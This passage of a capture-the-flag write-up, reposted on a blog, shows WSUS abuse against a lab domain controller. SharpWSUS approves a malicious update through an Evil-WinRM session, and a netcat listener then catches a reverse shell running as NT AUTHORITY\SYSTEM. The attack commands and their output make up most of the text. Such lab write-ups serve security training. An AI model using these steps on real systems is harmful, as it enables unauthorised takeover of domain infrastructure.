[*] SharpWSUS.exe delete /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

I need to approve that Update, using the syntax given in the output (/groupname is arbitrary):

*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update

[*] Approve complete

It takes about a minute for this to fire, and it fails occasionally. If it fails, I’ll try again, but eventually there’s a connection at nc:

kali$ rlwrap -cAr nc -lvnp 445 
Listening on
0.0.0.0 445 Connection received on 10.10.10.10 49944 Microsoft Windows [Version 10.0.17763.737] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system

 

posted @ 2024-01-15 11:37  lisenMiller  阅读(15)  评论(0编辑  收藏  举报